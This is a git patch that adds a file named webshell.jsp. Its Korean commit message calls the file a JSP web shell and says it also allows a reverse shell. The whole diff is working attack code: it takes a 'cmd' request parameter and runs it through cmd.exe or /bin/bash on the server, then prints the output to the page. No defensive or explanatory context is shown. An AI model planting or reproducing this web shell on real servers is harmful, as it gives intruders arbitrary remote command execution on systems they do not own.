From 4b3698ef966a9fa2864756c5485855b43a4c1402 Mon Sep 17 00:00:00 2001
From: Roronoawjd <105417063+Roronoawjd@users.noreply.github.com>
Date: Mon, 18 Sep 2023 18:14:26 +0900
Subject: [PATCH] =?UTF-8?q?=ED=99=95=EC=9E=A5=EC=9E=90=20jsp=20=EC=9B=B9?=
=?UTF-8?q?=EC=89=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
jsp 웹쉘(리버스 쉘 가능)
---
webshell.jsp | 55 ++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 webshell.jsp
diff --git a/webshell.jsp b/webshell.jsp
new file mode 100644
index 0000000..286faa4
--- /dev/null
+++ b/webshell.jsp
@@ -0,0 +1,55 @@
+<%@ page import="java.io.*, java.nio.charset.StandardCharsets" %>
+<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
+
+
+
+
+ Command Execution
+
+
+
+
+ <%
+ if (request.getParameter("cmd") != null)
+ {
+ String osName = System.getProperty("os.name").toLowerCase();
+ String command = request.getParameter("cmd");
+ out.println(""+"명령어 : " + request.getParameter("cmd") + "" + "
");
+ // Windows인 경우
+ if (osName.indexOf("windows") != -1) {
+ String[] cmdArray = {"cmd.exe", "/C", command};
+ ProcessBuilder pb = new ProcessBuilder(cmdArray);
+ pb.redirectErrorStream(true);
+ Process process = pb.start();
+
+ InputStreamReader in = new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8);
+ BufferedReader br = new BufferedReader(in);
+
+ String line;
+ while ((line = br.readLine()) != null) {
+ out.println(line +"
");
+ }
+ }
+ // 다른 OS인 경우 (Linux, macOS 등)
+ else {
+ String[] cmdArray = {"/bin/bash", "-c", command};
+ ProcessBuilder pb = new ProcessBuilder(cmdArray);
+ pb.redirectErrorStream(true);
+ Process process = pb.start();
+
+ InputStreamReader in = new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8);
+ BufferedReader br = new BufferedReader(in);
+
+ String line;
+ while ((line = br.readLine()) != null) {
+ out.println(line +"
");
+ }
+ }
+ }
+ %>
+
+
+